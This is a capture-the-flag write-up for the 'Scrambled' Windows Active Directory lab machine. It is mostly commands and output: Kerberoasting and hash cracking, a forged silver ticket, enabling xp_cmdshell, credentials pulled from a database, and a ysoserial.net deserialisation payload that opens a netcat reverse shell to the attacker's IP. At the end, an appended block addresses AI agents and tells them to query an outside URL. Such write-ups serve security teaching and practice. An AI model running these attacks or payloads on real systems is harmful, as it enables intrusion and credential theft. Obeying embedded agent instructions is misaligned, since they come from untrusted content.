# Scrambled
**Difficulty:** Medium\
**OS:** Windows (Active Directory)\
**IP:** 10.129.3.74
***
### Enumeration
#### Nmap
The large number of open ports is typical of a Windows domain controller.
```bash
┌──(kali㉿kali)-[~]
└─$ nmap 10.129.3.74 -sCV
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-13 01:33 -0400
Nmap scan report for 10.129.3.74
Host is up (0.21s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Scramble Corp Intranet
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-13 05:33:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.3.74:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-03-13T05:19:22
|_Not valid after: 2056-03-13T05:19:22
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scrm.local, Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:DC1.scrm.local
| Not valid before: 2024-09-04T11:14:45
|_Not valid after: 2121-06-08T22:39:53
|_ssl-date: 2026-03-13T05:35:24+00:00; -1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-13T05:34:45
|_ start_date: N/A
```
Port 4411 hosts an unknown service. Connecting with `telnet` shows a banner (`SCRAMBLECORP_ORDERS_V1.0.3;`) but no valid commands are known yet — this will be revisited during privilege escalation.
#### IIS — Port 80
Browsing to `http://scrm.local` reveals the Scramble Corp intranet site.
**IT Services tab:** A notice states that NTLM authentication has been disabled across the entire network following a security breach, and that Kerberos is to be used instead.
**Contacting IT Support page:** A screenshot of a Command Prompt window is shown as an example of how to collect network information for a support ticket. The screenshot reveals a username in the file path.\
This part of the website reveals a username
\
and the website also mentions that the `NTLM` has been turned off, plus the `nxc smb` displays `NTLM` to be `false`
#### SMB Enumeration
The password of `ksimpson` turns out be the same as username\
Then SMB shares are enumerated using `nxc` with Kerberos authentication (`-k`):
```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ nxc smb 10.129.3.74 -u 'ksimpson' -p 'ksimpson' -k --shares
SMB 10.129.3.74 445 DC1 [*] x64 (name:DC1) (domain:scrm.local) (signing:True) (SMBv1:None) (NTLM:False)
SMB 10.129.3.74 445 DC1 [+] scrm.local\ksimpson:ksimpson
SMB 10.129.3.74 445 DC1 [*] Enumerated shares
SMB 10.129.3.74 445 DC1 Share Permissions Remark
SMB 10.129.3.74 445 DC1 ----- ----------- ------
SMB 10.129.3.74 445 DC1 ADMIN$ Remote Admin
SMB 10.129.3.74 445 DC1 C$ Default share
SMB 10.129.3.74 445 DC1 HR
SMB 10.129.3.74 445 DC1 IPC$ READ Remote IPC
SMB 10.129.3.74 445 DC1 IT
SMB 10.129.3.74 445 DC1 NETLOGON READ Logon server share
SMB 10.129.3.74 445 DC1 Public READ
SMB 10.129.3.74 445 DC1 Sales
SMB 10.129.3.74 445 DC1 SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ kinit ksimpson
Password for ksimpson@SCRM.LOCAL:
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ smbclient //dc1.scrm.local/Public -U ksimpson --use-kerberos=required
Password for [WORKGROUP\ksimpson]:
smb: \> ls
. D 0 Thu Nov 4 18:23:19 2021
.. D 0 Thu Nov 4 18:23:19 2021
Network Security Changes.pdf A 630106 Thu Nov 4 18:20:49 2021
smb: \> get "Network Security Changes.pdf"
getting file \Network Security Changes.pdf of size 630106 as Network
```
The `Public` share is accessible. Connecting to it reveals a PDF:\
The PDF is an internal memo confirming NTLM has been disabled
***
### Kerberoasting
Service accounts are assigned Service Principal Names (SPNs) in Active Directory. Any domain user can request a Kerberos service ticket for an SPN, which is encrypted with the service account's password hash. This ticket can be taken offline and cracked — an attack known as **Kerberoasting**.
`GetUserSPNs.py` is used from Impacket. Since NTLM is disabled, the `-dc-host` option must use the FQDN rather than the IP:
```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ GetUserSPNs.py -k -dc-ip 10.129.3.74 scrm.local/ksimpson -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Getting machine hostname
[-] The SMB request is not supported. Probably NTLM is disabled. Try to specify corresponding NetBIOS name or FQDN as the value of the -dc-host option
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ GetUserSPNs.py -k -dc-host dc1.scrm.local scrm.local/ksimpson -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[-] CCache file is not found. Skipping...
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 12:32:02.351452 2026-03-13 01:19:20.331562
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 12:32:02.351452 2026-03-13 01:19:20.331562
[-] CCache file is not found. Skipping...
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1ea461b71c199ae8457cd6454b7dc245$d3...SNIP...bb492ac6353dc468705fde31f47dc47553b797bcb70afe66c82137355d6ebc6de029fadba
```
A TGS hash for the `sqlsvc` account is obtained. The hash is cracked with `hashcat`:
```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ hashcat -m 13100 sqlsvchash.txt /usr/share/wordlists/rockyou.txt
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1ea...SNIP...iojc8d4cb071ee:Pegasus60
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$1...b071ee
Time.Started.....: Fri Mar 13 02:38:15 2026 (8 secs)
Time.Estimated...: Fri Mar 13 02:38:23 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 1339.3 kH/s (1.69ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10731520/14344385 (74.81%)
Rejected.........: 0/10731520 (0.00%)
Restore.Point....: 10727424/14344385 (74.78%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Petey55 -> Pastillez
Hardware.Mon.#01.: Util: 73%
```
The plaintext password for `sqlsvc` is **`Pegasus60`**.
***
### Foothold — Silver Ticket Attack
Although we now have the password for `sqlsvc`, we cannot simply authenticate to MSSQL as that account and gain useful access. However, because `sqlsvc` is the service account running the MSSQL service and we know its password, we can perform a **silver ticket attack**.
A silver ticket is a forged Kerberos TGS (service ticket) that is signed using the service account's own password hash. Unlike a golden ticket, it does not involve the KDC — the ticket is forged entirely offline and used to authenticate directly to the target service, impersonating any user (including `Administrator`).
Three pieces of information are needed:
1. The **NTLM hash** of `sqlsvc`'s password
2. The **domain SID**
3. The **SPN** of the MSSQL service
#### Step 1 — Derive the NTLM Hash
NTLM hashes are computed as the MD4 hash of the UTF-16LE encoded password:
```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ python3 -c "import hashlib,binascii; print(binascii.hexlify(hashlib.new('md4', 'Pegasus60'.encode('utf-16le')).digest()).decode())"
b999a16500b87d17ec7f2e2a68778f05
```
#### Step 2 — Retrieve the Domain SID
`getPac.py` from Impacket is used to extract the domain SID:
```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ getPac.py -targetUser sqlsvc SCRM.LOCAL/ksimpson:ksimpson
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
...SNIP...
Domain SID: S-1-5-21-2743207045-1827831105-2542523200
```
#### Step 3 — Forge the Silver Ticket
`ticketer.py` from Impacket is used to forge a TGS ticket for the `Administrator` user against the MSSQL SPN:
```
┌──(kali㉿kali)-[~]
└─$ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain SCRM.LOCAL -spn MSSQLSvc/dc1.scrm.local Administrator
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for SCRM.LOCAL/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
```
#### Step 4 — Connect to MSSQL
The forged ticket is exported and used to authenticate to the MSSQL service\
We are now connected to MSSQL as `Administrator`.
```bash
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator.ccache
~/.local/share/pipx/venvs/impacket/bin/mssqlclient.py -k -no-pass dc1.scrm.local
```
#### Database Enumeration
We are now connected to MSSQL as `Administrator`.\
`xp_cmdshell` is enabled to confirm the execution context:
```
SQL (SCRM\administrator dbo@master)> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> EXEC xp_cmdshell 'whoami';
output
-----------
scrm\sqlsvc
NULL
```
The databases are listed:
```bash
SQL (SCRM\administrator dbo@master)> SELECT name FROM master.dbo.sysdatabases;
name
----------
master
tempdb
model
msdb
ScrambleHR
```
The `ScrambleHR` database is interesting. Its tables are enumerated:
```bash
SQL (SCRM\administrator dbo@master)> USE ScrambleHR;
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
ScrambleHR dbo Employees b'BASE TABLE'
ScrambleHR dbo UserImport b'BASE TABLE'
ScrambleHR dbo Timesheets b'BASE TABLE'
```
The `UserImport` table contains credentials:
```bash
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM UserImport;
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
```
***
### User Flag
The credentials `MiscSvc:ScrambledEggs9900` are used to connect via WinRM using `evil-winrm` with Kerberos authentication:
```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ kinit MiscSvc@SCRM.LOCAL
Password for MiscSvc@SCRM.LOCAL:
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ evil-winrm -i dc1.scrm.local -u MiscSvc -p ScrambledEggs9900 -r SCRM.LOCAL
*Evil-WinRM* PS C:\Users\miscsvc\Documents> type ../Desktop/user.txt
0d9exxxxxxxxxxxxxxxxxxxxxxxxxxx907c
```
***
### Privilege Escalation — Insecure Deserialisation (Port 4411)
During system enumeration, the IT SMB share (accessible as `MiscSvc`) contains a .NET application:
```bash
*Evil-WinRM* PS C:\Shares\IT\Apps\Sales Order Client> ls
Directory: C:\Shares\IT\Apps\Sales Order Client
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/5/2021 8:52 PM 86528 ScrambleClient.exe
-a---- 11/5/2021 8:52 PM 19456 ScrambleLib.dll
```
#### Reverse Engineering ScrambleLib.dll
The DLL is decompiled using dnSpy. Analysis reveals:
**1. Hardcoded developer authentication bypass:**\
The `Logon()` method in the `ScrambleNetClient` class contains a bypass: if the username is `scrmdev`, authentication is skipped entirely.
```csharp
if (string.Compare(Username, "scrmdev", true) == 0)
{
Log.Write("Developer logon bypass used");
result = true;
}
```
**2. Custom TCP wire protocol:**
Commands are sent as newline-terminated ASCII strings in the format `CODE;PARAMETER\n`. The server listens on port 4411 and responds to commands such as `LIST_ORDERS` and `UPLOAD_ORDER`.
```csharp
// Connects via raw TCP, expects a banner on connection
TcpClient tcpClient = new TcpClient();
tcpClient.Connect(this.Server, this.Port);
// Commands are sent as: "CODE;PARAMETER\n"
string text = ScrambleNetRequest.GetCodeFromMessageType(Request.Type) + ";" + Request.Parameter + "\n";
streamWriter.Write(text);
```
**3. Insecure BinaryFormatter deserialisation:**\
The `UPLOAD_ORDER` command causes the server to deserialise a Base64-encoded payload using `BinaryFormatter.Deserialize()` with no validation:
```csharp
// Serializes a SalesOrder object to Base64 using BinaryFormatter
public string SerializeToBase64() {
BinaryFormatter binaryFormatter = new BinaryFormatter();
binaryFormatter.Serialize(memoryStream, this);
return Convert.ToBase64String(memoryStream.ToArray());
}
// Server-side: deserializes attacker-controlled Base64 input
public static SalesOrder DeserializeFromBase64(string Base64) {
byte[] buffer = Convert.FromBase64String(Base64);
BinaryFormatter binaryFormatter = new BinaryFormatter();
result = (SalesOrder)binaryFormatter.Deserialize(memoryStream); // ← vulnerable
}
```
`BinaryFormatter` is an inherently unsafe deserialiser — it instantiates arbitrary .NET types during deserialisation, making it susceptible to gadget-chain attacks.
#### Crafting the Payload
`nc64.exe` is first uploaded to the target via the existing `MiscSvc` WinRM session:
```bash
*Evil-WinRM* PS C:\Users\miscsvc\music> upload nc64.exe
Info: Uploading /home/kali/Documents/scrambled/nc64.exe to
C:\Users\miscsvc\music\nc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!
```
A malicious serialised payload is generated using `ysoserial.net` with the `WindowsIdentity` gadget chain, which triggers command execution during deserialisation:
```powershell
E:\gg2\Release>ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "C:\users\miscsvc\music\nc64.exe -e powershell 10.10.16.5 4444"
AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBN0FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUVNNlhIVnpaWEp6WEcxcGMyTnpkbU5jYlhWemFXTmNibU0yTkM1bGVHVWdMV1VnY0c5M1pYSnphR1ZzYkNBeE1DNHhNQzR4Tmk0MUlEUTBORFFpSUZOMFlXNWtZWEprUlhKeWIzSkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRk4wWVc1a1lYSmtUM1YwY0hWMFJXNWpiMlJwYm1jOUludDRPazUxYkd4OUlpQlZjMlZ5VG1GdFpUMGlJaUJRWVhOemQyOXlaRDBpZTNnNlRuVnNiSDBpSUVSdmJXRnBiajBpSWlCTWIyRmtWWE5sY2xCeWIyWnBiR1U5SWtaaGJITmxJaUJHYVd4bFRtRnRaVDBpWTIxa0lpQXZQZzBLSUNBZ0lDQWdQQzl6WkRwUWNtOWpaWE56TGxOMFlYSjBTVzVtYno0TkNpQWdJQ0E4TDNOa09sQnliMk5sYzNNK0RRb2dJRHd2VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJK0N3PT0L
```
A listener is started:
```bash
┌──(kali㉿kali)-[~/Documents/scrambled/Release]
└─$ rlwrap nc -lvnp 4444
```
The payload is delivered to the server via telnet. The protocol flow is:
1. Connect — server responds with `SCRAMBLECORP_ORDERS_V1.0.3;`
2. No explicit login is needed; the `UPLOAD_ORDER` command is sent directly with the Base64 payload
```bash
┌──(kali㉿kali)-[~/Documents/scrambled]
└─$ telnet scrm.local 4411
Trying 10.129.3.74...
Connected to scrm.local.
Escape character is '^]'.
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAEAQAAAClTeXN0ZW0uU2VjdXJpdHkuUHJpbmNpcGFsLldpbmRvd3NJZGVudGl0eQEAAAAkU3lzdGVtLlNlY3VyaXR5LkNsYWltc0lkZW50aXR5LmFjdG9yAQYCAAAAkApBQUVBQUFELy8vLy9BUUFBQUFBQUFBQU1BZ0FBQUY1TmFXTnliM052Wm5RdVVHOTNaWEpUYUdWc2JDNUZaR2wwYjNJc0lGWmxjbk5wYjI0OU15NHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajB6TVdKbU16ZzFObUZrTXpZMFpUTTFCUUVBQUFCQ1RXbGpjbTl6YjJaMExsWnBjM1ZoYkZOMGRXUnBieTVVWlhoMExrWnZjbTFoZEhScGJtY3VWR1Y0ZEVadmNtMWhkSFJwYm1kU2RXNVFjbTl3WlhKMGFXVnpBUUFBQUE5R2IzSmxaM0p2ZFc1a1FuSjFjMmdCQWdBQUFBWURBQUFBN0FVOFAzaHRiQ0IyWlhKemFXOXVQU0l4TGpBaUlHVnVZMjlrYVc1blBTSjFkR1l0TVRZaVB6NE5DanhQWW1wbFkzUkVZWFJoVUhKdmRtbGtaWElnVFdWMGFHOWtUbUZ0WlQwaVUzUmhjblFpSUVselNXNXBkR2xoYkV4dllXUkZibUZpYkdWa1BTSkdZV3h6WlNJZ2VHMXNibk05SW1oMGRIQTZMeTl6WTJobGJXRnpMbTFwWTNKdmMyOW1kQzVqYjIwdmQybHVabmd2TWpBd05pOTRZVzFzTDNCeVpYTmxiblJoZEdsdmJpSWdlRzFzYm5NNmMyUTlJbU5zY2kxdVlXMWxjM0JoWTJVNlUzbHpkR1Z0TGtScFlXZHViM04wYVdOek8yRnpjMlZ0WW14NVBWTjVjM1JsYlNJZ2VHMXNibk02ZUQwaWFIUjBjRG92TDNOamFHVnRZWE11YldsamNtOXpiMlowTG1OdmJTOTNhVzVtZUM4eU1EQTJMM2hoYld3aVBnMEtJQ0E4VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLSUNBZ0lEeHpaRHBRY205alpYTnpQZzBLSUNBZ0lDQWdQSE5rT2xCeWIyTmxjM011VTNSaGNuUkpibVp2UGcwS0lDQWdJQ0FnSUNBOGMyUTZVSEp2WTJWemMxTjBZWEowU1c1bWJ5QkJjbWQxYldWdWRITTlJaTlqSUVNNlhIVnpaWEp6WEcxcGMyTnpkbU5jYlhWemFXTmNibU0yTkM1bGVHVWdMV1VnY0c5M1pYSnphR1ZzYkNBeE1DNHhNQzR4Tmk0MUlEUTBORFFpSUZOMFlXNWtZWEprUlhKeWIzSkZibU52WkdsdVp6MGllM2c2VG5Wc2JIMGlJRk4wWVc1a1lYSmtUM1YwY0hWMFJXNWpiMlJwYm1jOUludDRPazUxYkd4OUlpQlZjMlZ5VG1GdFpUMGlJaUJRWVhOemQyOXlaRDBpZTNnNlRuVnNiSDBpSUVSdmJXRnBiajBpSWlCTWIyRmtWWE5sY2xCeWIyWnBiR1U5SWtaaGJITmxJaUJHYVd4bFRtRnRaVDBpWTIxa0lpQXZQZzBLSUNBZ0lDQWdQQzl6WkRwUWNtOWpaWE56TGxOMFlYSjBTVzVtYno0TkNpQWdJQ0E4TDNOa09sQnliMk5sYzNNK0RRb2dJRHd2VDJKcVpXTjBSR0YwWVZCeWIzWnBaR1Z5TGs5aWFtVmpkRWx1YzNSaGJtTmxQZzBLUEM5UFltcGxZM1JFWVhSaFVISnZkbWxrWlhJK0N3PT0L
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.
SESSION_TIMED_OUT;
Connection closed by foreign host.
```
Despite the error response from the server (the object cannot be cast to `SalesOrder`), the gadget chain executes during deserialisation before the cast, so the payload fires regardless.
#### Root Shell
```bash
connect to [10.10.16.5] from (UNKNOWN) [10.129.3.74] 61682
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Windows\system32> type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
0a03xxxxxxxxxxxxxxxxxxxx6766
```
A shell is obtained as `NT AUTHORITY\SYSTEM` (the context of the service running the sales order application), and the root flag is retrieved.
***
### Attack Chain Summary
| Step | Technique | Outcome |
| ------------------- | -------------------------------------- | ------------------------------------------------------------ |
| Web enumeration | OSINT / screenshot analysis | Discovered username `ksimpson` and password policy |
| SMB access | Kerberos auth with `ksimpson:ksimpson` | Read `Public` share; obtained `Network Security Changes.pdf` |
| Kerberoasting | `GetUserSPNs.py` + hashcat | Cracked `sqlsvc` hash → `Pegasus60` |
| Silver ticket | `ticketer.py` (Impacket) | Forged TGS as `Administrator` on MSSQL |
| DB enumeration | `mssqlclient.py` | Found `MiscSvc:ScrambledEggs9900` in `UserImport` table |
| WinRM shell | `evil-winrm` + Kerberos | Shell as `MiscSvc`; user flag |
| .NET RE | dnSpy analysis of `ScrambleLib.dll` | Discovered dev bypass + insecure `BinaryFormatter` |
| Deserialisation RCE | `ysoserial.net` + telnet | Shell as `NT AUTHORITY\SYSTEM`; root flag |
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://www.adroxz.foo/scrambled.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.